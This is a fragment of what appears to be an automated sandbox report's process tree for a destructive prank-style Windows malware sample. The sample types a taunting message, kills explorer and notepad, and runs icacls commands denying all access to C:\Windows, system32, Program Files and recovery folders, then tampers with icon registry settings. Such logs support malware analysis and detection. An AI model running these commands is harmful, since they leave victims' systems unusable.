-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "p"2⤵PID:4972
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "e"2⤵PID:1776
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" " "2⤵PID:628
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "f"2⤵PID:4992
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "r"2⤵PID:4764
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "o"2⤵PID:2388
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "m"2⤵PID:3228
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" " "2⤵PID:3636
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "h"2⤵PID:4752
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "e"2⤵PID:3664
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "r"2⤵PID:3140
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "e"2⤵PID:1800
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "."2⤵PID:472
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" " "2⤵PID:1232
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "S"2⤵PID:1804
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "t"2⤵PID:2308
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "a"2⤵PID:1692
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "r"2⤵PID:2272
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "t"2⤵PID:3764
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" " "2⤵PID:956
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "c"2⤵PID:4280
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "r"2⤵PID:1156
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "y"2⤵PID:4440
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "i"2⤵PID:3696
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "n"2⤵PID:3208
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "g"2⤵PID:3648
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "!"2⤵PID:1288
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" " "2⤵PID:1812
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "H"2⤵PID:1100
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "A"2⤵PID:4792
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "H"2⤵PID:4600
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "A"2⤵PID:3776
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "H"2⤵PID:1864
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "A"2⤵PID:4952
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "H"2⤵PID:1648
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "A"2⤵PID:1516
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "H"2⤵PID:2588
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "A"2⤵PID:2008
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "H"2⤵PID:3728
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "A"2⤵PID:5096
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "H"2⤵PID:3440
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "A"2⤵PID:1600
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "A"2⤵PID:4956
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "H"2⤵PID:1032
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "A"2⤵PID:1940
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "H"2⤵PID:3304
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "H"2⤵PID:1632
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "A"2⤵PID:2420
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "H"2⤵PID:2052
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "A"2⤵PID:436
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "H"2⤵PID:920
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "A"2⤵PID:4312
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "H"2⤵PID:1904
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "A"2⤵PID:1704
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "H"2⤵PID:3952
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "A"2⤵PID:3420
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\type.vbs" "!"2⤵PID:4800
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im notepad.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3400
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /deny Everyone:(OI)(CI)F2⤵
- Modifies file permissions
PID:2580
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files" /deny Everyone:(OI)(CI)F2⤵
- Modifies file permissions
PID:2584
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData" /deny Everyone:(OI)(CI)F2⤵
- Modifies file permissions
PID:2748
-
-
C:\Windows\system32\icacls.exeicacls "C:\System Volume Information" /deny Everyone:(OI)(CI)F2⤵
- Modifies file permissions
PID:1348
-
-
C:\Windows\system32\icacls.exeicacls "C:\Recovery" /deny Everyone:(OI)(CI)F2⤵
- Modifies file permissions
PID:3764
-
-
C:\Windows\system32\icacls.exeicacls "C:\$RECYCLE.BIN" /deny Everyone:(OI)(CI)F2⤵
- Modifies file permissions
PID:4220
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\config" /deny Everyone:(OI)(CI)F2⤵
- Modifies file permissions
PID:4812
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32" /deny Everyone:(OI)(CI)F2⤵
- Modifies file permissions
PID:2676
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system" /deny Everyone:(OI)(CI)F2⤵
- Modifies file permissions
PID:2484
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\winsxs" /deny Everyone:(OI)(CI)F2⤵
- Modifies file permissions
PID:1824
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\SysWOW64" /deny Everyone:(OI)(CI)F2⤵
- Modifies file permissions
PID:3716
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics" /v IconSpacing /t REG_SZ /d -1500 /f2⤵PID:3720
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics" /v IconVerticalSpacing /t REG_SZ /d -1500 /f2⤵PID:784
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics" /v Shell Icon Size /t REG_SZ /d 32 /f2⤵PID:768
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics" /v IconFont /t REG_DWORD /d 0 /f2⤵PID:2248
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 3 /t REG_SZ /d "C:\ProgramData\Microsoft\Device Stage\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\pictures.ico" /f2⤵
- Modifies File Icons
PID:2220
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2964
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5068
-
-
C:\Windows\system32\mode.commode con: cols=50 lines=32⤵PID:3840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://youtu.be/Ys_F9bsrWkg2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:4580 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x14c,0x150,0x154,0x11c,0x158,0x7fff284c46f8,0x7fff284c4708,0x7fff284c47183⤵PID:1324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:23⤵PID:4752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:4136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:83⤵PID:1500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:13⤵PID:4812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:13⤵PID:1628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:13⤵PID:3720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:13⤵PID:3156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5300 /prefetch:83⤵PID:1300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:13⤵PID:5944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6876 /prefetch:83⤵PID:5168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:13⤵PID:5400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6820 /prefetch:83⤵PID:5480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7208 /prefetch:13⤵PID:5432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7428 /prefetch:13⤵PID:5972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5432 /prefetch:83⤵PID:5600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7388 /prefetch:83⤵PID:2512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
PID:4124 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x264,0x268,0x26c,0x240,0x270,0x7ff6f4ee5460,0x7ff6f4ee5470,0x7ff6f4ee54804⤵PID:5372
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7388 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:1400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6804 /prefetch:13⤵PID:632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1756 /prefetch:13⤵PID:5908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:13⤵PID:4808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7532 /prefetch:13⤵PID:2972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7500 /prefetch:13⤵PID:4588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6656 /prefetch:83⤵PID:6764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:13⤵PID:7056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7768 /prefetch:13⤵PID:6732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7728 /prefetch:83⤵PID:6824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8744 /prefetch:83⤵PID:5688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8764 /prefetch:13⤵PID:772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8800 /prefetch:83⤵PID:6492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7272 /prefetch:13⤵PID:1576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1808 /prefetch:83⤵PID:6444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8664 /prefetch:13⤵PID:3716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8804 /prefetch:83⤵PID:6460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8960 /prefetch:13⤵PID:6728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:13⤵PID:7044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=9188 /prefetch:83⤵PID:3324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8492 /prefetch:13⤵PID:6540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9136 /prefetch:13⤵PID:3556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:13⤵PID:5024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5980 /prefetch:83⤵PID:6524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7268 /prefetch:83⤵PID:4212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4012 /prefetch:83⤵PID:4224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6652 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
PID:6452
-
-
